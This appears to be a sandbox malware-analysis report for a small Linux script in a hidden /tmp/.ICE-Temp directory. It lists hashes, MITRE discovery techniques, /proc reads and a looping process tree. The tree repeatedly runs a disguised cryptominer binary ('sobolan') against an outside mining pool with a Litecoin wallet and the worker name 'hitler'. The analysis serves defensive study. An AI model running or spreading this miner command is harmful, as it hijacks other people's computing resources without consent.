7aaa0dc8ba8230a6f6af9e088ecbd51423177b90c7c7b3e439cefbf2da09065a

Analysis

max time kernel
140s
max time network
133s
platform
ubuntu-20.04_amd64
resource
ubuntu2004-amd64-20240729-en
resource tags

arch:amd64arch:i386image:ubuntu2004-amd64-20240729-enkernel:5.4.0-169-genericlocale:en-usos:ubuntu-20.04-amd64system
submitted
05-01-2025 14:04

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

.ICE-Temp/lol
Size

733B
MD5

0eba5ce29c4baf4888bd2a9dd39fec0a
SHA1

17f23530e3729300baf1e83276aa41b42e07c3bf
SHA256

0cd5b1bbe4219f258a3fc50a3c08cd70a59ecfb74cbd97c022db8932da2051cf
SHA512

74e9d9f8aaa9a6c81ae96d6dcd0fa28d7f47008e5b58512e88175d78c89cbe4c26b9c65e9d3f50b472a2bcf4ccae2be1aa26f59d5e35ac86080f21f7fd32cea5

Score

6^/10

discovery

Malware Config

Signatures

Enumerates running processes
Discovers information about currently running processes on the system

Reads CPU attributes 1 TTPs 16 IoCs

discovery

System Information Discovery

T1082

description	ioc	Process
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/636/cmdline	pgrep
File opened for reading	/proc/581/status	pgrep
File opened for reading	/proc/92/status	pgrep
File opened for reading	/proc/88/status	pgrep
File opened for reading	/proc/1098/cmdline	pgrep
File opened for reading	/proc/19/status	pgrep
File opened for reading	/proc/1076/status	pgrep
File opened for reading	/proc/1421/cmdline	pgrep
File opened for reading	/proc/201/cmdline	pgrep
File opened for reading	/proc/1242/cmdline	pgrep
File opened for reading	/proc/270/cmdline	pgrep
File opened for reading	/proc/1470/cmdline	pgrep
File opened for reading	/proc/436/cmdline	pgrep
File opened for reading	/proc/1077/cmdline	pgrep
File opened for reading	/proc/10/cmdline	pgrep
File opened for reading	/proc/73/cmdline	pgrep
File opened for reading	/proc/1092/status	pgrep
File opened for reading	/proc/78/cmdline	pgrep
File opened for reading	/proc/569/status	pgrep
File opened for reading	/proc/1038/cmdline	pgrep
File opened for reading	/proc/88/cmdline	pgrep
File opened for reading	/proc/569/status	pgrep
File opened for reading	/proc/978/status	pgrep
File opened for reading	/proc/1086/cmdline	pgrep
File opened for reading	/proc/964/cmdline	pgrep
File opened for reading	/proc/532/status	pgrep
File opened for reading	/proc/1072/status	pgrep
File opened for reading	/proc/1092/status	pgrep
File opened for reading	/proc/1/status	pgrep
File opened for reading	/proc/637/cmdline	pgrep
File opened for reading	/proc/929/status	pgrep
File opened for reading	/proc/569/cmdline	pgrep
File opened for reading	/proc/1061/status	pgrep
File opened for reading	/proc/168/status	pgrep
File opened for reading	/proc/1208/cmdline	pgrep
File opened for reading	/proc/170/cmdline	pgrep
File opened for reading	/proc/92/status	pgrep
File opened for reading	/proc/1419/status	pgrep
File opened for reading	/proc/201/status	pgrep
File opened for reading	/proc/969/status	pgrep
File opened for reading	/proc/2/status	pgrep
File opened for reading	/proc/582/cmdline	pgrep
File opened for reading	/proc/603/status	pgrep
File opened for reading	/proc/517/cmdline	pgrep
File opened for reading	/proc/73/status	pgrep
File opened for reading	/proc/1112/status	pgrep
File opened for reading	/proc/581/cmdline	pgrep
File opened for reading	/proc/167/status	pgrep
File opened for reading	/proc/21/status	pgrep
File opened for reading	/proc/1061/status	pgrep
File opened for reading	/proc/670/cmdline	pgrep
File opened for reading	/proc/445/status	pgrep
File opened for reading	/proc/451/cmdline	pgrep
File opened for reading	/proc/1113/cmdline	pgrep
File opened for reading	/proc/11/status	pgrep
File opened for reading	/proc/178/status	pgrep
File opened for reading	/proc/452/cmdline	pgrep
File opened for reading	/proc/636/status	pgrep
File opened for reading	/proc/17/status	pgrep
File opened for reading	/proc/self/auxv	pgrep
File opened for reading	/proc/178/status	pgrep
File opened for reading	/proc/781/cmdline	pgrep
File opened for reading	/proc/483/status	pgrep
File opened for reading	/proc/1428/status	pgrep

/tmp/.ICE-Temp/lol
/tmp/.ICE-Temp/lol
1⤵
PID:1422
- /usr/bin/pgrep
  pgrep -x sobolan
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1423
- /usr/bin/pgrep
  pgrep -x sobolan
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1425
- /tmp/.ICE-Temp/sobolan
  ./sobolan -a kawpow -o stratum+ssl://kp.unmineable.com:443 -u LTC:LZ2AyV2LeDtQ7m74DYhetgHwk2ofi5kvmw.hitler -p x --no-strict-ssl
  2⤵
  PID:1424
- /usr/bin/sleep
  sleep 10
  2⤵
  PID:1427
- /tmp/.ICE-Temp/sobolan
  ./sobolan -a kawpow -o stratum+ssl://kp.unmineable.com:443 -u LTC:LZ2AyV2LeDtQ7m74DYhetgHwk2ofi5kvmw.hitler -p x --no-strict-ssl
  2⤵
  PID:1426
- /usr/bin/pgrep
  pgrep -x sobolan
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1432
- /usr/bin/sleep
  sleep 10
  2⤵
  PID:1434
- /tmp/.ICE-Temp/sobolan
  ./sobolan -a kawpow -o stratum+ssl://kp.unmineable.com:443 -u LTC:LZ2AyV2LeDtQ7m74DYhetgHwk2ofi5kvmw.hitler -p x --no-strict-ssl
  2⤵
  PID:1433
- /usr/bin/pgrep
  pgrep -x sobolan
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1435
- /usr/bin/sleep
  sleep 10
  2⤵
  PID:1437
- /tmp/.ICE-Temp/sobolan
  ./sobolan -a kawpow -o stratum+ssl://kp.unmineable.com:443 -u LTC:LZ2AyV2LeDtQ7m74DYhetgHwk2ofi5kvmw.hitler -p x --no-strict-ssl
  2⤵
  PID:1436
- /usr/bin/pgrep
  pgrep -x sobolan
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1455
- /usr/bin/sleep
  sleep 10
  2⤵
  PID:1457
- /tmp/.ICE-Temp/sobolan
  ./sobolan -a kawpow -o stratum+ssl://kp.unmineable.com:443 -u LTC:LZ2AyV2LeDtQ7m74DYhetgHwk2ofi5kvmw.hitler -p x --no-strict-ssl
  2⤵
  PID:1456
- /usr/bin/pgrep
  pgrep -x sobolan
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1458
- /usr/bin/sleep
  sleep 10
  2⤵
  PID:1460
- /tmp/.ICE-Temp/sobolan
  ./sobolan -a kawpow -o stratum+ssl://kp.unmineable.com:443 -u LTC:LZ2AyV2LeDtQ7m74DYhetgHwk2ofi5kvmw.hitler -p x --no-strict-ssl
  2⤵
  PID:1459
- /usr/bin/pgrep
  pgrep -x sobolan
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1461
- /usr/bin/sleep
  sleep 10
  2⤵
  PID:1463
- /tmp/.ICE-Temp/sobolan
  ./sobolan -a kawpow -o stratum+ssl://kp.unmineable.com:443 -u LTC:LZ2AyV2LeDtQ7m74DYhetgHwk2ofi5kvmw.hitler -p x --no-strict-ssl
  2⤵
  PID:1462
- /usr/bin/pgrep
  pgrep -x sobolan
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1470
- /usr/bin/sleep
  sleep 10
  2⤵
  PID:1472
- /tmp/.ICE-Temp/sobolan
  ./sobolan -a kawpow -o stratum+ssl://kp.unmineable.com:443 -u LTC:LZ2AyV2LeDtQ7m74DYhetgHwk2ofi5kvmw.hitler -p x --no-strict-ssl
  2⤵
  PID:1471
- /usr/bin/pgrep
  pgrep -x sobolan
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1473
- /usr/bin/sleep
  sleep 10
  2⤵
  PID:1475
- /tmp/.ICE-Temp/sobolan
  ./sobolan -a kawpow -o stratum+ssl://kp.unmineable.com:443 -u LTC:LZ2AyV2LeDtQ7m74DYhetgHwk2ofi5kvmw.hitler -p x --no-strict-ssl
  2⤵
  PID:1474
- /usr/bin/pgrep
  pgrep -x sobolan
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1476
- /usr/bin/sleep
  sleep 10
  2⤵
  PID:1478
- /tmp/.ICE-Temp/sobolan
  ./sobolan -a kawpow -o stratum+ssl://kp.unmineable.com:443 -u LTC:LZ2AyV2LeDtQ7m74DYhetgHwk2ofi5kvmw.hitler -p x --no-strict-ssl
  2⤵
  PID:1477
- /usr/bin/pgrep
  pgrep -x sobolan
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1479
- /usr/bin/sleep
  sleep 10
  2⤵
  PID:1481
- /tmp/.ICE-Temp/sobolan
  ./sobolan -a kawpow -o stratum+ssl://kp.unmineable.com:443 -u LTC:LZ2AyV2LeDtQ7m74DYhetgHwk2ofi5kvmw.hitler -p x --no-strict-ssl
  2⤵
  PID:1480
- /usr/bin/pgrep
  pgrep -x sobolan
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1482
- /usr/bin/sleep
  sleep 10
  2⤵
  PID:1484
- /tmp/.ICE-Temp/sobolan
  ./sobolan -a kawpow -o stratum+ssl://kp.unmineable.com:443 -u LTC:LZ2AyV2LeDtQ7m74DYhetgHwk2ofi5kvmw.hitler -p x --no-strict-ssl
  2⤵
  PID:1483
- /usr/bin/pgrep
  pgrep -x sobolan
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1485
- /usr/bin/sleep
  sleep 10
  2⤵
  PID:1487
- /tmp/.ICE-Temp/sobolan
  ./sobolan -a kawpow -o stratum+ssl://kp.unmineable.com:443 -u LTC:LZ2AyV2LeDtQ7m74DYhetgHwk2ofi5kvmw.hitler -p x --no-strict-ssl
  2⤵
  PID:1486
- /usr/bin/pgrep
  pgrep -x sobolan
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1489
- /usr/bin/sleep
  sleep 10
  2⤵
  PID:1491
- /tmp/.ICE-Temp/sobolan
  ./sobolan -a kawpow -o stratum+ssl://kp.unmineable.com:443 -u LTC:LZ2AyV2LeDtQ7m74DYhetgHwk2ofi5kvmw.hitler -p x --no-strict-ssl
  2⤵
  PID:1490
- /usr/bin/pgrep
  pgrep -x sobolan
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1492
- /usr/bin/sleep
  sleep 10
  2⤵
  PID:1494
- /tmp/.ICE-Temp/sobolan
  ./sobolan -a kawpow -o stratum+ssl://kp.unmineable.com:443 -u LTC:LZ2AyV2LeDtQ7m74DYhetgHwk2ofi5kvmw.hitler -p x --no-strict-ssl
  2⤵
  PID:1493
- /usr/bin/pgrep
  pgrep -x sobolan
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1495
- /usr/bin/sleep
  sleep 10
  2⤵
  PID:1497
- /tmp/.ICE-Temp/sobolan
  ./sobolan -a kawpow -o stratum+ssl://kp.unmineable.com:443 -u LTC:LZ2AyV2LeDtQ7m74DYhetgHwk2ofi5kvmw.hitler -p x --no-strict-ssl
  2⤵
  PID:1496

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads